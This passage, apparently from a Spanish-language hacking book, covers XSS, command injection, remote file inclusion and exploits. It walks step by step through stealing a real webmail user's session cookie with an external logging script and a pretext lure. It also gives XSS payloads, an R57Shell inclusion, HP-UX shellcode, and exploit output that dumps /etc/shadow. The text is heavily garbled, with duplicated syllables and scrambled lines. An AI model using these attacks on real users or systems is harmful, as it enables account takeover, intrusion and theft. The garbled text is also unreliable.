niza za-ción. Pre via  viamen mente, te, detec detecta tamos mos que a la casi casilla lla también también la utili utiliza za para para cuestio cuestiones nes de traba tra bajo jo para para no usar el e-mail inter interno no de la empre empresa. sa.

Entonces, Enton ces, lo prime primero ro que nece necesi sita tamos mos es encon encontrar trar una vulne vulnera rabi bililidad dad XSS en el domi do minio nio del webmail, webmail, domi dominio nio que esta estará rá liga ligado do a la cookie cookie en cuestión. cuestión.

146

 

Doc.

Google hace poco sufrió la falla XSS. Miren el interesante detalle en: http://xs-sniper.com/blog/2008/04/14/google-xss/ 

Entramos Entra mos en el sitio sitio y vamos vamos proban probando, do, dentro dentro del domi dominio nio ubbi ubbi.com, .com, la ejecu ejecución ción de “>a t>alert(“[XSS]”)”. Lo encon encontra tramos mos en el URL: http://se http ://secu cure.ub re.ubbi bi.com .com/re /regis gistra tracion cion/Re /Recu cu pe  pero ro _Pas  _Pass.asp?srv=3”>alert(“[XSS]”) t>a lert(“[XSS]”) .

XSS2.

Compro Com proba bación ción de la vulne vulnera rabi bili lidad dad XSS en el domi dominio nio en cuestión. cuestión.

Una vez compro comproba bada da la vulne vulnera rabi bililidad, dad, podemos continuar con el paso pa so siguien siguien-Buscar

XSS

Hay una herra herramien mienta ta gratui gratuita ta para para buscar XSS en ww www.a w.acu cune netix tix.com .com/vul /vulne nera rabi bility-scan lity-scanner/ ner/ vulnera vulne rabi bilitys lityscan canne ner5.e r5.exe xe y en ww www.a w.acu cune netix tix.com .com/vul /vulne nera rabi bility-scan lity-scanner/wvs ner/wvs5ma 5manual.pdf nual.pdf su manual. ma nual. Si quere queremos mos ahorrar ahorrar tiempo tiempo con auto automa mati tiza zacio ciones, nes, pode podemos mos hacer hacerlo, lo, pero pero se nos puepuede pasar pasar por alto alto algo algo impor importan tante. te. Recor Recorde demos mos que es más eficien eficiente te buscar buscarlos los a mano. mano.

147

 

sitio tio contro controla lado do por noso nosotros tros y que, vía PHP, pueda pueda en viar co correos rreos te. En un si

electróni electró nicos cos (para (para en viar  viarnos nos la cookie cookie de la victi victima ma a Outlook Outlook y que cuando cuando llellegue éste éste nos dé un soni sonido do de aviso), aviso), tene tenemos mos que subir subir una carpe carpeta ta (en este este ejemejemplo llama llamada da harry) con los siguien si guientes tes archi archi vos:  vos:

Nombre Nom bre: item.js Códi Có digo go fuente fuente: location.href=’http://www.susitio.com/harry/log.ph location.href=’http://www.susitio.com/harry /log.php?item=’+esca p?item=’+escape pe (document.cookie) (do cument.cookie)

Nombre: log.php Nombre Códi Có digo go fuente fuente:

Una vez que esté esté la carpe carpeta ta con los archi archi vos  vos all allí,í, va vamos a prepa preparar rar el URL para para pasar pasar-le a la vícti víctima ma (con el pretex pretexto to de que es un concur concurso so para para su sobri sobrini nito to faná fanáti tico co de Harry Potter) Potter) a su correo correo ubbi ubbi.com. .com. Cuando Cuando se haga haga clic en esa URL, ocurri ocurrirá rá lo sisiguiente: guien te: • Vía e-m e-mail ail se nos en via  viará rá la cookie cookie de sesión sesión con la direc dirección ción IP, fecha fecha y hora. hora. • Acto se segui guido, do, se lo redi rediri rigi girá rá auto automá máti tica camen mente te a la pági página na que le pedi pedimos mos que entre. entre. El URL por en viar queda quedará rá así: http://se http ://secu cure.ub re.ubbi bi.com .com/re /regis gistra tracion cion/Re /Recu cu pe  pero ro _Pas  _Pass.asp?srv=3”>”  y/item.js>” Para Pa ra que la supues supuesta ta vícti víctima ma no sospe sospeche che del sitio sitio raro, raro, vamos vamos a codi codifi ficar carlo lo un popo148

 

co con morf v0.3. El resul resulta tado do es el siguien siguiente: te: http://se http ://secu cure.ub re.ubbi bi.com .com/re /regis gistra tracion/%52%65%63%75%70%65%72% cion/%52%65%63%75%70%65%72% 6 F % 5 F % 5 0 % 6 1 % 7 3 % 7 3 % 2 E % 6 1 % 7 3 % 7 0 % 3 F% F% 7 3 % 7 2 % 7 6 % 3D%33%22%3E%3C%73%63%72%69%70%74%20%73%72% 6 3 % 3 D % 6 8 % 7 4 % 7 4 % 7 0 % 3 A % 2 F% F% 2 F % 7 7 % 7 7 % 7 7 % 2 E % 7 3 % 6 9 %

772%72%79%2F 4 % 6 9 % 6 F % 6%69%74%65%6D%2E%6A%73%3E%22 4%65%75%64%73%2E%63%6F%6D%2F%68%61% 72%72%79%2F%69%74%65%6D%2E%6A%73%3E%22  A es este te (burdo) (burdo) URL de ejemplo, ejemplo, lo inclui incluimos mos en un e-mail confec confeccio ciona nado do en HTML y se lo en via  viamos mos a su casi casilla lla de www.ubbi www.ubbi.com. .com.  A lo su sumo, mo, la vícti víctima ma pensa pensará rá que es un enga engaño ño del tipo tipo phishing, phishing, pero pero la cookie cookie nos será será en via  viada da vía e-mail al dar tan solo solo un click .

 No es lo mismo

Exploits ploits Hotmail Hotmail o cosas Hay muchos muchos sitios sitios que hablan hablan de Ex cosas simi simila lares, res, pero pero nada nada más ale ja  jado do de estos estos exploits exploits de los que habla hablamos mos aquí. Esos sitios sitios son, simple simplemen mente, te, plaplaphishing hing que se aprove tafor ta formas mas de phis aprovechan chan de la igno ignoran rancia cia de las perso personas nas para para robar robar-le sus passwords passwords y su dine dinero. ro.

149

 

Aquí está está la imagen imagen del archi archivo vo en HTML linkea linkeado do (y edita editado) do) al URL prepa prepara rado do con XSS para para extraer extraerle le la cookie cookie de se sesión. sión. Ubbi.

Luego Lue go que la víctima hace click en el link que preparamos, au auto tomá máti tica camen mente te se ejeejecu cuta en su hacia máquina máqui na bases exses extra trayen yendo la infor inconcur forma mación ción su cookie coo kie (se sión Ub bi)tay el es XSS rediri redi rigi gido do las ba reado reales les del con curso so dede Harry Pot Potter ter(sesión (en wwen  w.Ubub-ubbi.com/sms bi .com/sms/ba /bases ses _harr  _harry.asp). y.asp). Mientras esta lee las bases Mientras bases del concur concurso, so, a noso nosotros tros nos llega llega la infor informa mación ción de la cookie coo kie a tra vés del cliente de correo cor reo Outlook Outlook Express, -enviada por el servidor en donde tenemos alojados los scripts PHP- de modo totalmente silencioso.

Aquí vemos vemos la infor informa mación ción tal como como llegó llegó a nues nuestro tro correo correo luego luego de que la vícti víctima ma hizo hizo un click en el link. Mail.

 Ahora vere  Ahora veremos mos cómo cómo utili utilizar zar esa infor informa mación ción para para estar estar dentro dentro de su Mailbox. Mailbox. PaPara eso, utili utiliza zare remos mos un proxy, en este este caso caso Snark, para para modi modifi ficar car la peti petición ción y manmandar la cookie cookie en via  viada da a Ubbi Ubbi y que así el ser vidor  vidor nos deje deje entrar entrar como como si fuéra fuéramos mos el verda verdade dero ro dueño dueño de la casi casilla. lla.

150

 

concurso. Bases La victima sin notar nada, ha sido redirigida a las bases del concurso. .

Ejecuta Ejecu tamos mos Snark, vamos vamos con el browser browser a http://mai http://mail.ub l.ubbi bi.co .com/in m/inbo box.asp?fld=1 x.asp?fld=1 (esta (es ta URL la obtu obtu vi  vimos mos al estar estar loguea logueados dos cuando cuando abrimos abrimos una cuenta cuenta de prueba prueba en Ubbi) Ubbi) y vemos vemos que apare aparece ce la peti petición ción para para ser edita editada. da.

Proxy. Al pasar pasar la peti petición ción el proxy Snark, esto nos da la posi posibi bili lidad dad

de cambiar cambiar al vuelo vuelo los valo valores res que llegan llegan hasta hasta el servi servidor dor de Ubbi. Ubbi.

En esa panta pantalla, lla, reempla reemplaza zamos mos los valo valores res de cookie cookie por los que nos llega lle garon ron por e-mail y los en via  viamos mos al ser vidor  vidor de Ubbi. Ubbi. Así, el session session hijac hijacking king ha conclui concluido. do.

151

 

Sesión dentro Sesión dentro de la casi casilla lla de la vícti víctima ma sin cono conocer cer el  password, pass word, a través través de Inter Internet net Explo Explorer. rer. Esta Esta vulne vulnera rabi bili lidad dad fue repor reporta tada da al perso personal nal de segu seguri ridad dad infor informá máti tica ca de Ubbi Ubbi (AGEA S.A.) en enero del 2008. Bienvenido.

Existen empleos Existen empleos mucho mucho más comple complejos jos de XSS, tanto tanto para para lograr lograr el XSS en el sitio vulne vulnera rable ble como como para para atacar atacar a una vícti víctima ma desde desde un sitio sitio vulne vulnera rable. ble. Es reco reco-menda men dable ble estu estudiar diar tres cosas cosas en espe especial cial acerca acerca de esta esta técni técnica ca (que muchos muchos subes subes-timan ti man y que es de un poten po tencial cial tremen tremendo do en manos manos de alguien alguien con inge ingenio): nio): • El exce celen lente te libro libro sobre sobre Cross Site Site Scripting, Scripting, edita editado do por Syngress, Syngress, titu titula lado do Cross Site Si te Scripting Scripting Attacks Attacks XSS Exploits Exploits and Defen Defense se (2007). Entre Entre sus redac redacto tores, res, se encuen en cuentra tra Petko Petko Petkov Petkov de GNUCI GNUCI TI  TIZEN. ZEN. • La herra rramien mienta ta XSS-Proxy, que pode podemos mos encon encontrar trar en http://xss-proxy.sour http://xss-proxy.source ce-forge for ge.net .net junto junto a algu algunos nos exce excelen lentes tes docu documen mentos. tos.

Visi sitar tar www.xs sitio en donde donde pode podemos mos encon encontrar trar exce excelen lentes tes notas, notas,  www.xssed sed.com .com, un sitio ejemplos ejem plos y listas listas de sitios sitios vulne vulnera rables. bles.

152

 

Sitio dedi Sitio dedica cado do exclu exclusi siva vamen mente te a cuestio cuestiones nes rela relacio ciona nadas das con el  Cross Site Site Scripting. Scripting. Ésta Ésta es la sección sección de artí artícu culos: los: www.xssed www.xssed.co .com/ar m/arti ticles cleslist list Xssed.

.

XSS afec tates tande tanto to laa orga losgani viniza visi sitan tantes tes de sihay tios que como como a los usuaelrios usuarios y sus adnos admi minis nistra dores oafecta agen agentes or zación. ción. Nositios subesti subes timar mar XSS. Algunos Algu cótrado códi digos gospara pa ra la compro comproba bación ción de la vulne vulnera rabi bili lidad: dad:

alert(‘xss’);// %3Cscript%3Ealert(‘XSS’)%3C/script%3E ;alert(%22XSS%22);// a alert(‘XSS’) lert(‘XSS’) > PT>”> ” alert(“XSS”) \”;alert(‘XSS’);// %22;alert(%22XSS%22);// %3cscript%3ealert(“XSS”);%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E <script>alert(document.cookie); <script>alert(document.cookie);<script>alert <script>alert(document.cookie);<s cript>alert alert(‘XSS’) ;”> ;”> ’)”>



Si queremos ver más ejemplos, podemos visitar la página de RSnake, en la siguiente dirección http http://ha.c ://ha.cker kers.org/xss.html. s.org/xss.html.

15 maneras de comprometer una casilla de correo  Además del XSS, existen  Además existen algu algunos nos otros méto métodos dos (entre (entre simples simples y avanza avanzados) dos) para para compro com prome meter ter una casi casilla lla de correo correo electró electróni nico. co.

Consejo para usuarios de Internet Conviene Convie ne utili utilizar zar el browser browser Fire Firefox fox con el comple complemen mento to noS para no noScript cript (http http://nos ://noscript cript.net .net) para sufrir su frir los XSS. No hace ha ce falta falta hacer hacer clic en un link o botón botón para para ser vícti víctima ma de Cross Site Site ScripScripting, pode podemos mos serlo serlo simple simplemen mente te entran entrando do en un sitio, sitio, al visua visuali lizar zar un e-mail o un mensa mensa je de foro fo ro y de modo modo total totalmen mente te transpa transparen rente te sin aviso aviso y sin notar notarlo. lo.

154

 

• • • • • • • • • • • • •

Probar pass words comu comunes, nes, lógi lógicos cos y los cono conoci cidos dos en versio versiones nes evolu evolucio ciona nadas. das. Probar pass words que el usuario usuario utili utiliza za en otros lados. lados. Apelar al vulne vulnera rable ble factor factor huma humano no (inge (ingenie niería ría social). social). Grabar las pulsa pulsacio ciones nes del tecla teclado do median mediante te un keylog keylogger ger de soft ware  ware o de hard wa  ware re.. Sacar cla ves alma almace cena nadas das en un pro vee  veedor dor de Inter Internet net (ISP). Sacar cla ves en tránsi trán sito to entre entre el ser vidor  vidor y la termi terminal nal (sniffing). (sniffing). Por re retrie ve: en viar  viarla la a otro e-mail al que sí tene tenemos mos acce acceso. so. Por ex explo plota tación ción de una vulne vulnera rabi bililidad dad median mediante te exploits exploits en la máqui máquina na del usuausuario o median mediante te shares shares (carpe (carpeta ta o disco disco compar comparti tido). do). Por su sustrac tracción ción de cla ves en aplica apli cacio ciones nes y ser vido  vidores res de terce terceros. ros. Porr fu Po fueerza bruta. bruta. Entrar vía log de HTTP_RE HTTP_REFE FERER RER (varia (variable ble prede predefi fini nida da de PHP, www.phpfreaks www.phpfreaks-.com/PHP_Re .com/PH P_Refe feren rence ce/Pre /Prede defi fined-Va ned-Varia riables/8.php) bles/8.php) direc directo to a la casi casilla lla sin cla ve. Asalto físi físico co a la máqui máquina na de la victi victima ma vía USB u otro puerto puerto o unidad. unidad. Evasión de pregun pregunta ta secre secreta ta u otro dato dato a tra vés de SQL In Injec jection. tion.

• Méto todos dos avanza avanzados dos o comple complejos jos como como Ea ves  vesdrop dropping ping (ver el conte conteni nido do de un moni mo nitor tor por emisión emisión de radia radiación). ción). • Méto todos dos de campo campo como como Trashing Trashing (re vi  visar sar la basu basura), ra), shoulder shoulder surfing (mirar (mirar cuando cuando un usuario usuario teclea), teclea), filma filmación ción del tecla teclado, do, mirar mirar si no lo tiene tiene anota anotado do en un papel papel en el escri es crito torio, rio, deba debajo jo del tecla teclado, do, en el CPU o con un Post-It pega pegado do en el moni monitor. tor.

Ejecu Eje cución ción remo remota ta de coman comandos dos e inclu inclusión sión de archi archivos vos La progra programa mación ción PHP en los sitios sitios juega juega un rol muy impor importan tante. te. Los archi archi vos  vos inincluidos clui dos en un sitio sitio progra programa mado do de modo modo inse insegu guro ro permi permiti tirán, rán, entre entre otras cosas: cosas: • Ejecu cutar tar coman comandos dos de siste sistema ma dentro dentro del ser vidor.  vidor. • Subir archi archi vos  vos (scripts de eje ejecu cució ción/ex n/explo plora ración) ción) al ser vidor,  vidor, técni técnica ca cono conoci cida da como co mo Re Remo mote te file file inclu inclusion sion. En el primer primer caso, caso, se apro ve  vecha cha el script mal progra programa mado do en PHP para para que, lueluego de que éste éste cumpla cumpla la función función que en un inicio inicio el progra programa mador dor ideó, segui seguida da-mente men te ejecu ejecute te un coman comando do de siste sistema. ma. ¿Cómo ¿Cómo lograr lograr esto? esto? Simple Simplemen mente, te, buscar buscar la conca concate tena nación ción de las accio acciones nes agregan agregando do un punto punto y coma coma antes antes del coman comando do en un campo campo de datos datos (en este este caso) caso) por proce procesar. sar. Por ejemplo: ejemplo: www  www.si .sitio tio vul  vulne nera rable ble-.com/ping.php .com /ping.php?=va ?=valor-real lor-real;co ;coman mando-li do-linux nux. El punto punto y coma coma en Linux Linux es usado usado para pa ra sepa separar rar coman comandos dos por ejecu ejecutar tar en una secuen secuencia: cia: coman comando do1;co 1;coman mando do2;co 2;coman man-do3.

155

 

Aquí, en el campo campo de datos datos de un script que hace hace pings a hosts remo re motos, tos, se intro introdu du jo el coman co mando do listar listar ;ls –al en lu lugar de una direc dirección ción IP. Como Co mo resul resulta tado, do, obte obtene nemos mos una lista lista deta detalla llada da de los archi archivos vos que se encuen encuentran tran en el mismo mismo direc directo torio rio que el script que reali realiza za pings.

Comando.

En el segun segundo do ejemplo, ejemplo, para para re remo mote te file file inclu include de , en lugar lugar de colo colocar car un cocomando man do en el URL se intro introdu duce ce una direc dirección ción web con el archi archi vo  vo des descar carga gable ble o ejecu eje cuta table ble en el host vícti víctima. ma. El archi archi vo  vo pue puede de bajar bajarse se o bien, bajar bajarse se y acto acto segui seguido do ejecu ejecutar tarse. se. Por ejemplo: ejemplo: www  www.si .sitio tio vul  vulne nera rable ble.com .com/mos /mostra trar.asp r.asp?fi ?file=www. le=www. sitio sitioma malig lig--

no.co no .com/ar m/archi chi vomaligno  vomal igno.txt .txt .

156

 

En el URL se reempla reemplaza za parte parte de la direc dirección ción para para agregar agregar el backdoor backdoor R57Shell  R57Shell  1.31 (www.r57.li/r57.txt?) (www.r57.li/r57.txt?) y así ejecu ejecutar tar la inter interfaz faz gráfi gráfica ca de coman comandos dos en el servi servidor. dor.

ShellPHP.

El progra programa mador dor y el admi adminis nistra trador dor del ser vi  vidor dor debe deberán rán tomar tomar las precau precaucio ciones nes nenecesa ce sarias rias en el dise diseño ño de la aplica aplicación ción o de los scripts para para luego luego testear testearlos los y así desdespejar pe jar dudas. dudas. Un buen recur recurso so para para empe empezar zar a hacer hacerlo lo es estu estudiar diar la guía de segu seguri ri-http://phpsec.org c.org/pro /projects jects/gui /guide de ). dad PHP ( http://phpse

Progra Pro grama mación ción inse insegu gura: ra: exploits exploits Los exploits exploits son, en su mayo mayoría, ría, peque pequeños ños progra programas mas arte artesa sana nales les (algu (algunos nos extre extrema ma-damen da mente te comple complejos) jos) que, al ser ejecu ejecuta tados dos y si son funcio funciona nales, les, se apro ve  vechan chan de un bug (descui (descuido do de progra programa mación) ción) en el obje objeti ti vo.  vo. El nom nombre bre pro vie  viene ne de to exex ploit o explo explotar, tar, que signi signifi fica ca apro ve  vechar charse se de la vulne vulnera rabi bililidad. dad. Pueden Pue den estar estar creados creados espe especí cífi fica camen mente te para para demos demostrar trar una falla falla (POC, Proof Of  Concept Con cept, prueba prueba de concep concepto) to) en deter determi mina nada da aplica aplicación ción o parte parte del siste sistema ma opeope-

Exploits y advisories Aquí están están los sitios sitios de algu algunas nas de las perso personas nas y grupos grupos que escri escribie bieron ron (e hicie hicieron ron públi públicos) cos) advi viso sories ries (avi intere inte resan santes tes exploits exploits o ad (avisos sos de segu seguri ridad dad que permi permiten ten escri escribir bir exploits exploits por su fuente fuen te de datos datos técni técnicos cos del bug): TESO TESO ( http http://pac ://packets ketstorm torm.li .linux nuxse secu curity rity.com .com/groups /groups/te /teso/ so/), NSFo NS Focus cus (www.ns www.nsfo focus cus.co .com/en/ m/en/) y Solar Solar Eclipse Eclipse (www.ph www.phree reedo dom.org m.org/so /sola lar/ex r/exploits/ ploits/).

157

 

rati ti vo  vo (ser vicio,  vicio, bina binario rio o kernel) kernel) en una audi audito toria ria de códi código go o research research liga ligado do a sesera guri gu ridad dad (testear (testear si un siste sistema ma está está asegu asegura rado do correc correcta tamen mente), te), o bien para para come cometer ter un acto acto no auto autori riza zado do en un siste sistema, ma, una intru intrusión sión (obten (obtención ción de una shell remo remo--

ta sin auto autori riza zación), ción), ele va  vación ción de pri vile  vilegios gios (obte (obtener ner permi permisos sos de root o system), system), dene de nega gación ción de ser vi  vicios cios o destruc destrucción ción de infor informa mación. ción. El obje objeti ti vo  vo propio pro pio o ajeno ajeno de testear testearse se con el exploit exploit está está en la deci decisión sión de quien lo mani manipu pula, la, ya que por sí solo so lo no es un progra programa ma malig maligno. no. Si cae en manos ma nos de un script kiddie, kiddie, deja dejaría ría de tener tener propó propósi sitos tos educa educati ti vos  vos ya que és éste te no va probar probar deter deter-mina mi nada da falla falla en una in ves  vesti tiga gación ción seria. seria.

Antiguo Anti guo repo reposi sito torio rio de exploits exploits libres libres al públi público. co. Se encon encontra traba ba en la direc dirección ción http://hack http://hack.co .co.z .zaa y hoy hoy pue puede de verse verse en uno de los pocos pocos mirrors mi rrors que queda quedaron: ron: http://dark http://darknet net.hac .hacklib klib.com/lynx.html. .com/lynx.html. Mirror.

Exploits Ex ploits loca locales les y remo remotos tos Los ex ploits locales loca se texto ejeto ejecu cutan tan den troopera de rati una shell para para apro  vechar  ve charse se de albién algo go que está es tá exploits den dentro tro de eselescontex con o siste sisdentro tema ma ope ti vo,  vo, y los re motos remo tos (si bien tam también se ejecu eje cutan tan en una shell y es posi posible ble hacer hacerlo lo contra contra la misma misma shell), el obje objeti ti vo  vo en la mayo ma yoría ría de los casos casos esta estará rá en otro host o direc dirección ción IP, ya sea a tra vés de In Inter ter-net o de una red local local e inter interna. na. 158

 

 Aunque común  Aunque comúnmen mente te los encon encontra trare remos mos escri escritos tos en C y assembly, assembly, los exploits exploits puepueden estar estar progra programa mados dos en varios varios lengua lenguajes, jes, ya que hay en Perl, Python, Python, C++, enentre otros. Éstos, Éstos, a su vez, pueden pueden encon encontrar trarse se compi compila lados dos o no, como como también también disdisponi po nibles bles para para las más di versas  versas arqui arquitec tectu turas. ras. Para Pa ra ver algu algunos nos ejemplos, ejemplos, pode podemos mos visi visitar tar sitios como  www  www.milw0rm .milw0rm.com .com o  www.pac  www .packets ketstorm tormse secu curit rit y.org  y.org. Los más comple complejos jos y los que usualmen usualmente te se utiutililizan, zan, son aquellos aquellos que se apro ve  vechan chan de una condi condición ción deno denomi mina nada da desbor desborda da-miento mien to de buffer buffer (buffer (buffer overflow). overflow). ¿Qué es esto? esto? La mejor mejor defi defini nición ción se encuen encuen-tra en el diccio dicciona nario rio Jargon Jargon (www.jar (www.jargon gon.net .net/jar /jargon gonfifile/s/s le/s/smasht mashthes hestack.html) tack.html) y  dice di ce “ smash the stack  (ba (bajo jo progra programa mación ción C). En algu algunas nas imple implemen menta tacio ciones nes de C es posi posible ble corrom corromper per la pila pila de ejecu ejecución ción (exe(execution cu tion stack) escri escribien biendo do más allá del fin de una cade ca dena na decla declara rada da auto auto en una rurutitina. na. El códi código go que hace hace esto esto posi posible ble se dice dice que desbor desborda da la pila pila (smash the stack) y puede puede causar causar el retor retorno no de la ruti rutina na y el salto salto a una direc dirección ción casual. casual. Esto Esto puede puede produ pro ducir cir algu algunos nos de los más malig malignos nos bugs cono conoci cidos dos hasta hasta ahora. ahora. Existen Existen ciertas ciertas  varian  va riantes tes (de traduc traducción ción lite literal ral dudo dudosa) sa) que reci reciben ben los siguien siguientes tes nombres nombres en ininglés: trash the stack, scribble scribble the stack, mangle mangle the stack. También También se suele suele usar papara descri describir bir smash the stack: alias bug, fandan fandango go on core, core, memory memory leak, prece preceden den-ce lossa lossage, ge, overrun overrun screw.” Pode Podemos mos encon encontrar trar esto esto en el exce excelen lente te texto texto de Aleph One publi publica cado do en la phrack phrack N.° 49 y tradu traduci cido do por Hono Honoriak riak al espa español ñol en julia ju lianor nor.tri .tripod pod.com/bc/s .com/bc/smas mashing/P49-4-Smas hing/P49-4-Smashing_t hing_the_s he_stack-Spa tack-Spanish.txt. nish.txt. En pocas pocas pala palabras, bras, una vez que el exploit exploit logra logra desbor desbordar dar el buffer, buffer, inyec inyecta ta los cocomandos man dos decla declara rados dos en el shellco shellcode de (progra (programa mado do gene general ralmen mente te en assembly, assembly, pero pero escri es crito to en forma formato to hexa hexade deci cimal). mal). Un coman comando do que se ejecu ejecuta tará rá para para apro ve  vechar charse se de esa condi condición ción BOF (Buffer (Buffer Overflow) Overflow) y lograr lograr así el propó propósi sito. to. Éste És te sería sería sólo sólo el shellco shellcode de para para ejecu ejecutar tar una shell en la plata platafor forma ma HP-UX. /* *

Hp-Ux

* *

execve() of /bin/sh by K2

*/ u_ch u_ char ar sh shel ell lcode[] = “\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40” “\x01\x62\xb 4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe” “\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe” “\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe /bin/sh\xff”;

Para Pa ra más deta detalles lles técni técnicos, cos, pode podemos mos visi visitar tar http://good http://goodfe fellas.s llas.shell hellco code de 159

 

.co .com.ar m.ar/docz /docz/bof /bof/bof-for /bof-forkidz-es.txt kidz-es.txt o el tuto tutorial rial de shellco shellcoding ding que encon encontra tramos mos en www.vi www.vi vidma  vidmachi chines nes.com/s .com/shell hellco code/s de/shell hellco code.html de.html Éste És te es un simple simple ejemplo ejemplo (output) (output) de ejecu ejecución ción para para exploit exploit local local (explo (explota ta un bug  del kernel kernel del Linux Linux en el que esta estamos) mos) para para ele var pri vile  vilegios, gios, luego luego de ser escri escrito to en la shell median mediante te el editor editor  vi:  —8< lab@www2:/tmp$ gcc c.c -o c

(se compila)

lab@www2:/tmp$ ./c

(se ejecuta el el compilado)

[+] Attached to 24087 [+] Signal caught [+] Shellcode placed at 0x4000e61d [+] Now wait for suid shell... sh-2.05a# cat /etc/shadow

(aquí, como root vemos el archivo shadow)

root:cshEOcCXG6Y1w:11790:0:99999:7::: daemon:*:11773:0:99999:7::: bin:*:11773:0:99999:7::: news:*:11773:0:99999:7::: uucp:*:11773:0:99999:7::: proxy:*:11773:0:99999:7:::  —8<

 A cont continua inuación ción,, vemo vemoss el ejem ejemplo plo de un exploit ex ploit remo remoto to que, al ser ejecu ejecuta tado do con la direc dirección ción IP del obje objetiti vo,  vo, nos da en él una shel shelll di direc recta tamen mente te con pri vi vilegios le gios de root a tra vés tra vés del ser ser vi  vicio cio Samba. Samba. [root@rootlabs]# ./ss -b 0 direc recció ción-i n-ip-r p-remo emota ta

(ejecu (ej ecució ción) n)

samba-2.2.8 < remo mot te root exploit by eSDee (www.netric.org|be)  ———————————————————————————————  ——————————————————————————————  + Brute Brutefor force ce mod mode. e. (Lin (Linux) ux) + Host is running samba. + Worked!  ———————————————————————————————  ——————————————————————————————  *** JE MOET JE MUIL HOUWE

160

 

2.4.20-ac2 #1 Sun Ma Mar 5 04:20:06 MST 20 2006 i686 unknown Linux it100 2. uid=0( uid =0(roo root) t) gid gid=0( =0(roo root) t) gro groups ups=13 =13543 543236 2365,9 5,98(n 8(nobo obody) dy) su root cat ca t /e /etc tc/i /is ssue Welcome to \s \r \r (\l) cat ca t /e /etc tc/s /sha hado dow w root:$1$El01X6Rb$c/6WyBkNQgmvQ3hcBe5/D/:12111:0::::: bin:*:9797:0::::: daemon:*:9797:0::::: shutdown:*:9797:0::::: halt:*:9797:0::::: smmsp:*:9797:0:::::  —8<

 A conti continua nuación, ción, veamos veamos algu algunas nas pala palabras bras utili utiliza zadas das a modo modo de lunfar lunfardo do o slang  rela re lacio ciona nadas das con los exploits. exploits. Conseguir guir uid0: uid0: Es por uid (user ID) 0 (cero). • Conse (ce ro). Es refe referen rente te al usuario usuario root, conse con seguir guir pri vile  vilegios gios de root. • Es pau  paunear near una shell (to spawn a shell): Dispa Disparar rar una shell, bindear. bindear. Hacer Hacer que una shell sea habi habili lita tada da (en via  viada) da) por la vícti víctima ma al atacan atacante, te, pudien pudiendo do éste éste contar con tar con una sesión sesión inte interac racti ti va  va median mediante te coman comandos. dos. • Roo Rootear, tear, rutear, rutear, enru enrutear tear:: Conse Conseguir guir pri vile  vilegios gios de root. • 0wned, p0wned, p0wned, owned, owned, pwned pwned:: Adueña Adueñado, do, que le in va  vadie dieron ron la máqui máquina, na, pápágina gi na web o ser ver a la vícti víctima. ma. Es una forma forma cíni cínica ca de decir decir que alguien alguien fue comcomprome pro meti tido do (en parte parte de su esce escena nario rio o pri vaci  vacidad) dad) median mediante te técni técnicas cas de hacking. hacking. • Priv8 (keep in priv8): priv es pri vate  vate (pri vado),  vado), 8 es eigth. Así,  pri veigth  veigth sue suena na como co mo pri  pri vate  vate en inglés. inglés. Se utili utiliza za para para anunciar anunciar que se manten mantenga ga en pri vado  vado el

exploit ex ploit y no se haga ha ga públi público. co. • 0day o Zero Zero Day: Day: Exploit Exploit pri vado,  vado, no públi público. co. • Ex plo  ploit it in in the the wild wild:: Exploit Exploit recien reciente te que se está está usando usando para para come cometer ter intru intrusio siones nes al azar o masi masi vas  vas sobre sobre ser vicios  vicios y que existe existe un ad vi  visory sory de la falla falla que explo explota ta.. 161

 

www.milw0rm.com

Aquí podemos encontrar muchos exploits locales y remotos, de las más variadas plataformas y aplicaciones, publicados por sus propios autores. Contaremos también con un sistema de desciframiento online de contraseñas hasheadas en algoritmo MD5, videos de técnicas de intrusión y artículos interesantes acerca de seguridad.

162

 

6 > Inyección de código SQL SQ L En es este te ca capí pítu tulo lo ve vere remo mos s la las s ca cara ract cter erís ísti tica cas s y el alc lca anc nce e que tie iene ne un des escu cui ido im impo por rta tan nte en los lo s ac acti tivo vos s po por r la de defi fici cien ente te im impl plem emen enta taci ción ón de se segu guri rida dad d in info form rmát átic ica, a, ta tant nto o en el có códi digo go com omo o en la ad admi min nis istr tra aci ción ón de un con onte tex xto do don nde

se lleva a cabo la gestión de información con base ba se de da dato tos s re rela laci cion onal ales es. . Deta De tall lles es, , ej ejem empl plos os y ca caso sos s de SQ SQL L In Inje ject ctio ion, n, su impa im pact cto, o, co comp mpon onen ente tes s in invo volu lucr crad ados os y su inci in cide denc ncia ia en el es esce cena nari rio o de la or orga gani niza zaci ción ón. .

 

INTRODUCCIÓN

El descuido que permite inyectar código SQL ( Structured Structured Query Language  ) va a perdurar tanto –por lo humano- y es tan interesante, que se merece un capítulo aparte. En la actualidad, un gran número de sitios y aplicaciones web interactúan con bases de datos ya que, a través de éstos, se maneja información de diferentes niveles de criticidad, que deben ser almacenados, consultados o modificados, es decir, gestionados gestionados de algún modo. Esta información –sensible –sensible o no-, es acced accedida ida a travéss de sentenc travé sentencias ias SQL, embebidas embebidas desde el mismo código fuente de la página o scripts incluidos.

Curso.  En

la dirección www.aulaclic.es/sql/f_sql.htm, encontramos un curso básico y gratuito acerca de SQL.

La interacción interacción ocurre más o menos de este modo: • El usuario introduce datos en un formulario o hace clic en un link del tipo http://sitioweb/producto.asp?id=25. • El sitio web podría estar programado en .asp o .php (entre otros lenguajes) y a su  vez contendrá, con tendrá, en su código fuente, strings SQL (sentencias). • Éstas, junto con los datos suministrados por el visitante, irán directamente a la base Otr tra as cl cla ase ses s de ev eva asi sión ón

En www.f5. www.f5.com/pdf/w com/pdf/white-p hite-papers/sql apers/sql-inje -injectionction-detecti detection-wp. on-wp.pdf, pdf, hay un excel excelente ente texto que explica las técnicas de evasión aplicadas al SQL Injection, como pueden ser el uso de codificación HEX, UNICODE, BASE64, Decimal, como también manipulación de espacios en blanco, comentarios del tipo código fuente C, concatenación, etcétera.

164

 

de datos para lograr almacenamiento, un resultado a partir de lo que ideó e interpretó el programador o analista: consulta, modificación, borrado, ejecución, etcétera. • El resultado puede mostrarse al usuario o no, o bien puede dar un error de sistema.
